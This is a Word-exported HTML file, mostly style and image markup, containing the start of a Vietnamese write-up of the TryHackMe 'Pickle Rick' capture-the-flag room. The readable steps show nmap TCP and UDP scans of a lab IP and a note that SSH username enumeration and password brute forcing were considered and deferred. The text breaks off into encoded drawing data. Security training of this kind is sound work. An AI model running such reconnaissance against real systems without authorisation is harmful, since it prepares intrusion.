mso-level-number-position:left;
|
||
text-indent:-.25in;
|
||
font-family:Symbol;}
|
||
@list l4:level2
|
||
{mso-level-number-format:bullet;
|
||
mso-level-text:o;
|
||
mso-level-tab-stop:none;
|
||
mso-level-number-position:left;
|
||
text-indent:-.25in;
|
||
font-family:"Courier New";}
|
||
@list l4:level3
|
||
{mso-level-number-format:bullet;
|
||
mso-level-text:\F0A7;
|
||
mso-level-tab-stop:none;
|
||
mso-level-number-position:left;
|
||
text-indent:-.25in;
|
||
font-family:Wingdings;}
|
||
@list l4:level4
|
||
{mso-level-number-format:bullet;
|
||
mso-level-text:\F0B7;
|
||
mso-level-tab-stop:none;
|
||
mso-level-number-position:left;
|
||
text-indent:-.25in;
|
||
font-family:Symbol;}
|
||
@list l4:level5
|
||
{mso-level-number-format:bullet;
|
||
mso-level-text:o;
|
||
mso-level-tab-stop:none;
|
||
mso-level-number-position:left;
|
||
text-indent:-.25in;
|
||
font-family:"Courier New";}
|
||
@list l4:level6
|
||
{mso-level-number-format:bullet;
|
||
mso-level-text:\F0A7;
|
||
mso-level-tab-stop:none;
|
||
mso-level-number-position:left;
|
||
text-indent:-.25in;
|
||
font-family:Wingdings;}
|
||
@list l4:level7
|
||
{mso-level-number-format:bullet;
|
||
mso-level-text:\F0B7;
|
||
mso-level-tab-stop:none;
|
||
mso-level-number-position:left;
|
||
text-indent:-.25in;
|
||
font-family:Symbol;}
|
||
@list l4:level8
|
||
{mso-level-number-format:bullet;
|
||
mso-level-text:o;
|
||
mso-level-tab-stop:none;
|
||
mso-level-number-position:left;
|
||
text-indent:-.25in;
|
||
font-family:"Courier New";}
|
||
@list l4:level9
|
||
{mso-level-number-format:bullet;
|
||
mso-level-text:\F0A7;
|
||
mso-level-tab-stop:none;
|
||
mso-level-number-position:left;
|
||
text-indent:-.25in;
|
||
font-family:Wingdings;}
|
||
@list l5
|
||
{mso-list-id:1432119546;
|
||
mso-list-type:hybrid;
|
||
mso-list-template-ids:268365904 67698689 67698691 67698693 67698689 67698691 67698693 67698689 67698691 67698693;}
|
||
@list l5:level1
|
||
{mso-level-number-format:bullet;
|
||
mso-level-text:\F0B7;
|
||
mso-level-tab-stop:none;
|
||
mso-level-number-position:left;
|
||
text-indent:-.25in;
|
||
font-family:Symbol;}
|
||
@list l5:level2
|
||
{mso-level-number-format:bullet;
|
||
mso-level-text:o;
|
||
mso-level-tab-stop:none;
|
||
mso-level-number-position:left;
|
||
text-indent:-.25in;
|
||
font-family:"Courier New";}
|
||
@list l5:level3
|
||
{mso-level-number-format:bullet;
|
||
mso-level-text:\F0A7;
|
||
mso-level-tab-stop:none;
|
||
mso-level-number-position:left;
|
||
text-indent:-.25in;
|
||
font-family:Wingdings;}
|
||
@list l5:level4
|
||
{mso-level-number-format:bullet;
|
||
mso-level-text:\F0B7;
|
||
mso-level-tab-stop:none;
|
||
mso-level-number-position:left;
|
||
text-indent:-.25in;
|
||
font-family:Symbol;}
|
||
@list l5:level5
|
||
{mso-level-number-format:bullet;
|
||
mso-level-text:o;
|
||
mso-level-tab-stop:none;
|
||
mso-level-number-position:left;
|
||
text-indent:-.25in;
|
||
font-family:"Courier New";}
|
||
@list l5:level6
|
||
{mso-level-number-format:bullet;
|
||
mso-level-text:\F0A7;
|
||
mso-level-tab-stop:none;
|
||
mso-level-number-position:left;
|
||
text-indent:-.25in;
|
||
font-family:Wingdings;}
|
||
@list l5:level7
|
||
{mso-level-number-format:bullet;
|
||
mso-level-text:\F0B7;
|
||
mso-level-tab-stop:none;
|
||
mso-level-number-position:left;
|
||
text-indent:-.25in;
|
||
font-family:Symbol;}
|
||
@list l5:level8
|
||
{mso-level-number-format:bullet;
|
||
mso-level-text:o;
|
||
mso-level-tab-stop:none;
|
||
mso-level-number-position:left;
|
||
text-indent:-.25in;
|
||
font-family:"Courier New";}
|
||
@list l5:level9
|
||
{mso-level-number-format:bullet;
|
||
mso-level-text:\F0A7;
|
||
mso-level-tab-stop:none;
|
||
mso-level-number-position:left;
|
||
text-indent:-.25in;
|
||
font-family:Wingdings;}
|
||
@list l6
|
||
{mso-list-id:1511290503;
|
||
mso-list-type:hybrid;
|
||
mso-list-template-ids:-724898288 67698689 -1 -1 -1 -1 -1 -1 -1 -1;}
|
||
@list l6:level1
|
||
{mso-level-number-format:bullet;
|
||
mso-level-text:\F0B7;
|
||
mso-level-tab-stop:none;
|
||
mso-level-number-position:left;
|
||
text-indent:-.25in;
|
||
font-family:Symbol;}
|
||
@list l6:level2
|
||
{mso-level-number-format:bullet;
|
||
mso-level-text:o;
|
||
mso-level-tab-stop:none;
|
||
mso-level-number-position:left;
|
||
text-indent:-.25in;
|
||
font-family:"Courier New";}
|
||
@list l6:level3
|
||
{mso-level-number-format:bullet;
|
||
mso-level-text:\F0A7;
|
||
mso-level-tab-stop:none;
|
||
mso-level-number-position:left;
|
||
text-indent:-.25in;
|
||
font-family:Wingdings;}
|
||
@list l6:level4
|
||
{mso-level-number-format:bullet;
|
||
mso-level-text:\F0B7;
|
||
mso-level-tab-stop:none;
|
||
mso-level-number-position:left;
|
||
text-indent:-.25in;
|
||
font-family:Symbol;}
|
||
@list l6:level5
|
||
{mso-level-number-format:bullet;
|
||
mso-level-text:o;
|
||
mso-level-tab-stop:none;
|
||
mso-level-number-position:left;
|
||
text-indent:-.25in;
|
||
font-family:"Courier New";}
|
||
@list l6:level6
|
||
{mso-level-number-format:bullet;
|
||
mso-level-text:\F0A7;
|
||
mso-level-tab-stop:none;
|
||
mso-level-number-position:left;
|
||
text-indent:-.25in;
|
||
font-family:Wingdings;}
|
||
@list l6:level7
|
||
{mso-level-number-format:bullet;
|
||
mso-level-text:\F0B7;
|
||
mso-level-tab-stop:none;
|
||
mso-level-number-position:left;
|
||
text-indent:-.25in;
|
||
font-family:Symbol;}
|
||
@list l6:level8
|
||
{mso-level-number-format:bullet;
|
||
mso-level-text:o;
|
||
mso-level-tab-stop:none;
|
||
mso-level-number-position:left;
|
||
text-indent:-.25in;
|
||
font-family:"Courier New";}
|
||
@list l6:level9
|
||
{mso-level-number-format:bullet;
|
||
mso-level-text:\F0A7;
|
||
mso-level-tab-stop:none;
|
||
mso-level-number-position:left;
|
||
text-indent:-.25in;
|
||
font-family:Wingdings;}
|
||
@list l7
|
||
{mso-list-id:2030527857;
|
||
mso-list-type:hybrid;
|
||
mso-list-template-ids:-121980200 67698689 67698691 67698693 67698689 67698691 67698693 67698689 67698691 67698693;}
|
||
@list l7:level1
|
||
{mso-level-number-format:bullet;
|
||
mso-level-text:\F0B7;
|
||
mso-level-tab-stop:none;
|
||
mso-level-number-position:left;
|
||
text-indent:-.25in;
|
||
font-family:Symbol;}
|
||
@list l7:level2
|
||
{mso-level-number-format:bullet;
|
||
mso-level-text:o;
|
||
mso-level-tab-stop:none;
|
||
mso-level-number-position:left;
|
||
text-indent:-.25in;
|
||
font-family:"Courier New";}
|
||
@list l7:level3
|
||
{mso-level-number-format:bullet;
|
||
mso-level-text:\F0A7;
|
||
mso-level-tab-stop:none;
|
||
mso-level-number-position:left;
|
||
text-indent:-.25in;
|
||
font-family:Wingdings;}
|
||
@list l7:level4
|
||
{mso-level-number-format:bullet;
|
||
mso-level-text:\F0B7;
|
||
mso-level-tab-stop:none;
|
||
mso-level-number-position:left;
|
||
text-indent:-.25in;
|
||
font-family:Symbol;}
|
||
@list l7:level5
|
||
{mso-level-number-format:bullet;
|
||
mso-level-text:o;
|
||
mso-level-tab-stop:none;
|
||
mso-level-number-position:left;
|
||
text-indent:-.25in;
|
||
font-family:"Courier New";}
|
||
@list l7:level6
|
||
{mso-level-number-format:bullet;
|
||
mso-level-text:\F0A7;
|
||
mso-level-tab-stop:none;
|
||
mso-level-number-position:left;
|
||
text-indent:-.25in;
|
||
font-family:Wingdings;}
|
||
@list l7:level7
|
||
{mso-level-number-format:bullet;
|
||
mso-level-text:\F0B7;
|
||
mso-level-tab-stop:none;
|
||
mso-level-number-position:left;
|
||
text-indent:-.25in;
|
||
font-family:Symbol;}
|
||
@list l7:level8
|
||
{mso-level-number-format:bullet;
|
||
mso-level-text:o;
|
||
mso-level-tab-stop:none;
|
||
mso-level-number-position:left;
|
||
text-indent:-.25in;
|
||
font-family:"Courier New";}
|
||
@list l7:level9
|
||
{mso-level-number-format:bullet;
|
||
mso-level-text:\F0A7;
|
||
mso-level-tab-stop:none;
|
||
mso-level-number-position:left;
|
||
text-indent:-.25in;
|
||
font-family:Wingdings;}
|
||
ol
|
||
{margin-bottom:0in;}
|
||
ul
|
||
{margin-bottom:0in;}
|
||
-->
|
||
</style>
|
||
<!--[if gte mso 10]>
|
||
<style>
|
||
/* Style Definitions */
|
||
table.MsoNormalTable
|
||
{mso-style-name:"Table Normal";
|
||
mso-tstyle-rowband-size:0;
|
||
mso-tstyle-colband-size:0;
|
||
mso-style-noshow:yes;
|
||
mso-style-priority:99;
|
||
mso-style-parent:"";
|
||
mso-padding-alt:0in 5.4pt 0in 5.4pt;
|
||
mso-para-margin-top:0in;
|
||
mso-para-margin-right:0in;
|
||
mso-para-margin-bottom:8.0pt;
|
||
mso-para-margin-left:0in;
|
||
line-height:107%;
|
||
mso-pagination:widow-orphan;
|
||
font-size:11.0pt;
|
||
font-family:"Calibri",sans-serif;
|
||
mso-ascii-font-family:Calibri;
|
||
mso-ascii-theme-font:minor-latin;
|
||
mso-hansi-font-family:Calibri;
|
||
mso-hansi-theme-font:minor-latin;
|
||
mso-bidi-font-family:"Times New Roman";
|
||
mso-bidi-theme-font:minor-bidi;}
|
||
</style>
|
||
<![endif]--><!--[if gte mso 9]><xml>
|
||
<o:shapedefaults v:ext="edit" spidmax="1027"/>
|
||
</xml><![endif]--><!--[if gte mso 9]><xml>
|
||
<o:shapelayout v:ext="edit">
|
||
<o:idmap v:ext="edit" data="1"/>
|
||
</o:shapelayout></xml><![endif]-->
|
||
</head>
|
||
|
||
<body lang=EN-US link="#0563C1" vlink="#954F72" style='tab-interval:.5in;
|
||
word-wrap:break-word'>
|
||
|
||
<div class=WordSection1>
|
||
|
||
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
|
||
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>Server
|
||
khai thác:<o:p></o:p></span></p>
|
||
|
||
<p class=MsoNormal style='text-align:justify'><a
|
||
href="https://tryhackme.com/room/picklerick"><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
|
||
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>https://tryhackme.com/room/picklerick</span></a><span
|
||
style='font-size:13.0pt;line-height:107%;font-family:"Calibri Light",sans-serif;
|
||
mso-ascii-theme-font:major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:
|
||
major-latin'><o:p></o:p></span></p>
|
||
|
||
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
|
||
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>Thực
|
||
hiện start machine để lấy địa chỉ ip của
|
||
mục tiêu cần khai thác:<o:p></o:p></span></p>
|
||
|
||
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
|
||
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin;
|
||
mso-no-proof:yes'><!--[if gte vml 1]><v:shapetype id="_x0000_t75" coordsize="21600,21600"
|
||
o:spt="75" o:preferrelative="t" path="m@4@5l@4@11@9@11@9@5xe" filled="f"
|
||
stroked="f">
|
||
<v:stroke joinstyle="miter"/>
|
||
<v:formulas>
|
||
<v:f eqn="if lineDrawn pixelLineWidth 0"/>
|
||
<v:f eqn="sum @0 1 0"/>
|
||
<v:f eqn="sum 0 0 @1"/>
|
||
<v:f eqn="prod @2 1 2"/>
|
||
<v:f eqn="prod @3 21600 pixelWidth"/>
|
||
<v:f eqn="prod @3 21600 pixelHeight"/>
|
||
<v:f eqn="sum @0 0 1"/>
|
||
<v:f eqn="prod @6 1 2"/>
|
||
<v:f eqn="prod @7 21600 pixelWidth"/>
|
||
<v:f eqn="sum @8 21600 0"/>
|
||
<v:f eqn="prod @7 21600 pixelHeight"/>
|
||
<v:f eqn="sum @10 21600 0"/>
|
||
</v:formulas>
|
||
<v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
|
||
<o:lock v:ext="edit" aspectratio="t"/>
|
||
</v:shapetype><v:shape id="Picture_x0020_1" o:spid="_x0000_i1055" type="#_x0000_t75"
|
||
style='width:468pt;height:52.8pt;visibility:visible;mso-wrap-style:square'>
|
||
<v:imagedata src="Khai%20thác%20Pickle%20Rick%20_files/image001.png" o:title=""/>
|
||
</v:shape><![endif]--><![if !vml]><img border=0 width=624 height=70
|
||
src="Khai%20thác%20Pickle%20Rick%20_files/image002.png" v:shapes="Picture_x0020_1"><![endif]></span><span
|
||
style='font-size:13.0pt;line-height:107%;font-family:"Calibri Light",sans-serif;
|
||
mso-ascii-theme-font:major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:
|
||
major-latin'><o:p></o:p></span></p>
|
||
|
||
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
|
||
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>Ping
|
||
kiểm tra máy Kali có đang cùng mạng với Mục tiêu
|
||
hay ko:<o:p></o:p></span></p>
|
||
|
||
<p class=MsoNormal align=center style='text-align:center'><span
|
||
style='font-size:13.0pt;line-height:107%;font-family:"Calibri Light",sans-serif;
|
||
mso-ascii-theme-font:major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:
|
||
major-latin;mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_5"
|
||
o:spid="_x0000_i1054" type="#_x0000_t75" alt="Text Description automatically generated"
|
||
style='width:343.2pt;height:93.6pt;visibility:visible;mso-wrap-style:square'>
|
||
<v:imagedata src="Khai%20thác%20Pickle%20Rick%20_files/image003.png" o:title="Text Description automatically generated"/>
|
||
</v:shape><![endif]--><![if !vml]><img border=0 width=458 height=125
|
||
src="Khai%20thác%20Pickle%20Rick%20_files/image004.png"
|
||
alt="Text Description automatically generated" v:shapes="Picture_x0020_5"><![endif]></span><span
|
||
style='font-size:13.0pt;line-height:107%;font-family:"Calibri Light",sans-serif;
|
||
mso-ascii-theme-font:major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:
|
||
major-latin'><o:p></o:p></span></p>
|
||
|
||
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
|
||
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>Thực
|
||
hiện scan các port TCP:<o:p></o:p></span></p>
|
||
|
||
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
|
||
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin;
|
||
color:red'>nmap -vv -Pn -T4 -sC -sV -O -p- 10.10.176.127<o:p></o:p></span></p>
|
||
|
||
<p class=MsoNormal align=center style='text-align:center'><span
|
||
style='font-size:13.0pt;line-height:107%;font-family:"Calibri Light",sans-serif;
|
||
mso-ascii-theme-font:major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:
|
||
major-latin;color:black;mso-themecolor:text1;mso-no-proof:yes'><!--[if gte vml 1]><v:shape
|
||
id="Picture_x0020_3" o:spid="_x0000_i1053" type="#_x0000_t75" style='width:467.4pt;
|
||
height:236.4pt;visibility:visible;mso-wrap-style:square'>
|
||
<v:imagedata src="Khai%20thác%20Pickle%20Rick%20_files/image005.png" o:title=""/>
|
||
</v:shape><![endif]--><![if !vml]><img border=0 width=623 height=315
|
||
src="Khai%20thác%20Pickle%20Rick%20_files/image006.png" v:shapes="Picture_x0020_3"><![endif]></span><span
|
||
style='font-size:13.0pt;line-height:107%;font-family:"Calibri Light",sans-serif;
|
||
mso-ascii-theme-font:major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:
|
||
major-latin;color:black;mso-themecolor:text1'><o:p></o:p></span></p>
|
||
|
||
<p class=MsoNormal align=center style='text-align:center'><span
|
||
style='font-size:13.0pt;line-height:107%;font-family:"Calibri Light",sans-serif;
|
||
mso-ascii-theme-font:major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:
|
||
major-latin;color:black;mso-themecolor:text1;mso-no-proof:yes'><!--[if gte vml 1]><v:shape
|
||
id="Picture_x0020_4" o:spid="_x0000_i1052" type="#_x0000_t75" alt="Graphical user interface Description automatically generated"
|
||
style='width:468pt;height:188.4pt;visibility:visible;mso-wrap-style:square'>
|
||
<v:imagedata src="Khai%20thác%20Pickle%20Rick%20_files/image007.png" o:title="Graphical user interface Description automatically generated"/>
|
||
</v:shape><![endif]--><![if !vml]><img border=0 width=624 height=251
|
||
src="Khai%20thác%20Pickle%20Rick%20_files/image008.png"
|
||
alt="Graphical user interface Description automatically generated"
|
||
v:shapes="Picture_x0020_4"><![endif]></span><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
|
||
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin;
|
||
color:black;mso-themecolor:text1'><o:p></o:p></span></p>
|
||
|
||
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
|
||
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin;
|
||
color:black;mso-themecolor:text1'>Thực hiện việc scan các
|
||
port UDP<o:p></o:p></span></p>
|
||
|
||
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
|
||
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin;
|
||
color:red'>nmap -vv -Pn -T4 -sU -sV 10.10.176.127<o:p></o:p></span></p>
|
||
|
||
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
|
||
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin;
|
||
color:black;mso-themecolor:text1;mso-no-proof:yes'><!--[if gte vml 1]><v:shape
|
||
id="Picture_x0020_8" o:spid="_x0000_i1051" type="#_x0000_t75" style='width:468pt;
|
||
height:224.4pt;visibility:visible;mso-wrap-style:square'>
|
||
<v:imagedata src="Khai%20thác%20Pickle%20Rick%20_files/image009.png" o:title=""/>
|
||
</v:shape><![endif]--><![if !vml]><img border=0 width=624 height=299
|
||
src="Khai%20thác%20Pickle%20Rick%20_files/image010.png" v:shapes="Picture_x0020_8"><![endif]></span><span
|
||
style='font-size:13.0pt;line-height:107%;font-family:"Calibri Light",sans-serif;
|
||
mso-ascii-theme-font:major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:
|
||
major-latin;color:black;mso-themecolor:text1'><o:p></o:p></span></p>
|
||
|
||
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
|
||
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>Dựa
|
||
trên kết quả quét các port TCP và phiên bản như trên, có
|
||
thể thấy Server đang mở 2 port 22 và 80. Trong đó
|
||
port 22 là service SSH với phiên bản OpenSSH 7.2p2.<o:p></o:p></span></p>
|
||
|
||
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
|
||
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>Thử
|
||
truy cập bằng ssh đên server -> nhưng thất bại<o:p></o:p></span></p>
|
||
|
||
<p class=MsoNormal align=center style='text-align:center'><span
|
||
style='font-size:13.0pt;line-height:107%;font-family:"Calibri Light",sans-serif;
|
||
mso-ascii-theme-font:major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:
|
||
major-latin;mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_6"
|
||
o:spid="_x0000_i1050" type="#_x0000_t75" alt="Text Description automatically generated"
|
||
style='width:424.8pt;height:96pt;visibility:visible;mso-wrap-style:square'>
|
||
<v:imagedata src="Khai%20thác%20Pickle%20Rick%20_files/image011.png" o:title="Text Description automatically generated"/>
|
||
</v:shape><![endif]--><![if !vml]><img border=0 width=566 height=128
|
||
src="Khai%20thác%20Pickle%20Rick%20_files/image012.png"
|
||
alt="Text Description automatically generated" v:shapes="Picture_x0020_6"><![endif]></span><span
|
||
style='font-size:13.0pt;line-height:107%;font-family:"Calibri Light",sans-serif;
|
||
mso-ascii-theme-font:major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:
|
||
major-latin'><o:p></o:p></span></p>
|
||
|
||
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
|
||
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>Tìm
|
||
lỗi liên quan đến phiên bản của SSH này<o:p></o:p></span></p>
|
||
|
||
<p class=MsoNormal align=center style='text-align:center'><span
|
||
style='font-size:13.0pt;line-height:107%;font-family:"Calibri Light",sans-serif;
|
||
mso-ascii-theme-font:major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:
|
||
major-latin;mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_7"
|
||
o:spid="_x0000_i1049" type="#_x0000_t75" alt="Text Description automatically generated"
|
||
style='width:425.4pt;height:153pt;visibility:visible;mso-wrap-style:square'>
|
||
<v:imagedata src="Khai%20thác%20Pickle%20Rick%20_files/image013.png" o:title="Text Description automatically generated"/>
|
||
</v:shape><![endif]--><![if !vml]><img border=0 width=567 height=204
|
||
src="Khai%20thác%20Pickle%20Rick%20_files/image014.png"
|
||
alt="Text Description automatically generated" v:shapes="Picture_x0020_7"><![endif]></span><span
|
||
style='font-size:13.0pt;line-height:107%;font-family:"Calibri Light",sans-serif;
|
||
mso-ascii-theme-font:major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:
|
||
major-latin'><o:p></o:p></span></p>
|
||
|
||
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
|
||
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>Dựa
|
||
vào kết quả tìm kiếm, rất có thể Server dính lỗ
|
||
hỏng “Usename Enumeration”. Thông qua tìm hiểu thì lỗi này
|
||
thường chạy rất mất thời gian để
|
||
tìm ra username cho SSH, sau đó lại còn phải brute force tìm
|
||
password cho tài khoản đó mà chưa chắc sẽ tìm ra
|
||
được -> tạm thời bỏ qua.<o:p></o:p></span></p>
|
||
|
||
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
|
||
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>Chuyển
|
||
đến tiếp theo sẽ là port 80. Tiến hành truy cập
|
||
trang web theo địa chỉ của Server, tìm source:<o:p></o:p></span></p>
|
||
|
||
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
|
||
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin;
|
||
mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_9" o:spid="_x0000_i1048"
|
||
type="#_x0000_t75" alt="Graphical user interface Description automatically generated with low confidence"
|
||
style='width:467.4pt;height:222pt;visibility:visible;mso-wrap-style:square'>
|
||
<v:imagedata src="Khai%20thác%20Pickle%20Rick%20_files/image015.png" o:title="Graphical user interface Description automatically generated with low confidence"/>
|
||
</v:shape><![endif]--><![if !vml]><img border=0 width=623 height=296
|
||
src="Khai%20thác%20Pickle%20Rick%20_files/image016.png"
|
||
alt="Graphical user interface Description automatically generated with low confidence"
|
||
v:shapes="Picture_x0020_9"><![endif]></span><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
|
||
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'><o:p></o:p></span></p>
|
||
|
||
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
|
||
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'>Và
|
||
src của nó sẽ là:<o:p></o:p></span></p>
|
||
|
||
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
|
||
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'><o:p> </o:p></span></p>
|
||
|
||
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
|
||
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'><o:p> </o:p></span></p>
|
||
|
||
<p class=MsoNormal style='text-align:justify'><span style='font-size:13.0pt;
|
||
line-height:107%;font-family:"Calibri Light",sans-serif;mso-ascii-theme-font:
|
||
major-latin;mso-hansi-theme-font:major-latin;mso-bidi-theme-font:major-latin'><o:p> </o:p></span></p>
|
||
|
||
<p class=MsoNormal style='text-align:justify'><!--[if gte vml 1]><v:rect id="Rectangle_x0020_12"
|
||
o:spid="_x0000_s1026" style='position:absolute;left:0;text-align:left;
|
||
margin-left:7.65pt;margin-top:-42.55pt;width:457.65pt;height:696pt;z-index:251659264;
|
||
visibility:visible;mso-wrap-style:square;mso-height-percent:0;
|
||
mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;
|
||
mso-wrap-distance-bottom:0;mso-position-horizontal:absolute;
|
||
mso-position-horizontal-relative:text;mso-position-vertical:absolute;
|
||
mso-position-vertical-relative:text;mso-height-percent:0;
|
||
mso-height-relative:margin;v-text-anchor:middle' o:gfxdata="UEsDBBQABgAIAAAAIQC2gziS/gAAAOEBAAATAAAAW0NvbnRlbnRfVHlwZXNdLnhtbJSRQU7DMBBF
|
||
90jcwfIWJU67QAgl6YK0S0CoHGBkTxKLZGx5TGhvj5O2G0SRWNoz/78nu9wcxkFMGNg6quQqL6RA
|
||
0s5Y6ir5vt9lD1JwBDIwOMJKHpHlpr69KfdHjyxSmriSfYz+USnWPY7AufNIadK6MEJMx9ApD/oD
|
||
OlTrorhX2lFEilmcO2RdNtjC5xDF9pCuTyYBB5bi6bQ4syoJ3g9WQ0ymaiLzg5KdCXlKLjvcW893
|
||
SUOqXwnz5DrgnHtJTxOsQfEKIT7DmDSUCaxw7Rqn8787ZsmRM9e2VmPeBN4uqYvTtW7jvijg9N/y
|
||
JsXecLq0q+WD6m8AAAD//wMAUEsDBBQABgAIAAAAIQA4/SH/1gAAAJQBAAALAAAAX3JlbHMvLnJl
|
||
bHOkkMFqwzAMhu+DvYPRfXGawxijTi+j0GvpHsDYimMaW0Yy2fr2M4PBMnrbUb/Q94l/f/hMi1qR
|
||
JVI2sOt6UJgd+ZiDgffL8ekFlFSbvV0oo4EbChzGx4f9GRdb25HMsYhqlCwG5lrLq9biZkxWOiqY
|
||
22YiTra2kYMu1l1tQD30/bPm3wwYN0x18gb45AdQl1tp5j/sFB2T0FQ7R0nTNEV3j6o9feQzro1i
|
||
OWA14Fm+Q8a1a8+Bvu/d/dMb2JY5uiPbhG/ktn4cqGU/er3pcvwCAAD//wMAUEsDBBQABgAIAAAA
|
||
IQDs7YxUaQIAACoFAAAOAAAAZHJzL2Uyb0RvYy54bWysVMFu2zAMvQ/YPwi6r46zdkuDOkWQosOA
|
||
og3WDj0rshQbkEWNUmJnXz9KdpyiLXYYloNDieQj9fSoq+uuMWyv0NdgC56fTThTVkJZ223Bfz7d
|
||
fppx5oOwpTBgVcEPyvPrxccPV62bqylUYEqFjECsn7eu4FUIbp5lXlaqEf4MnLLk1ICNCLTEbVai
|
||
aAm9Mdl0MvmStYClQ5DKe9q96Z18kfC1VjI8aO1VYKbg1FtIX0zfTfxmiysx36JwVS2HNsQ/dNGI
|
||
2lLREepGBMF2WL+BamqJ4EGHMwlNBlrXUqUz0GnyyavTPFbCqXQWIse7kSb//2Dl/f7RrZFoaJ2f
|
||
ezLjKTqNTfyn/liXyDqMZKkuMEmbF7M8v5xNOZPkm80+X9J1RDqzU7pDH74paFg0Co50G4kksb/z
|
||
oQ89hsRqFm5rY+L+qZdkhYNRMcDYH0qzuqTq0wSUZKJWBtle0AULKZUNee+qRKn67YsJ/YbWxozU
|
||
aAKMyJoKj9gDQJTgW+y+7SE+pqqksjF58rfG+uQxI1UGG8bkpraA7wEYOtVQuY8/ktRTE1kK3aaj
|
||
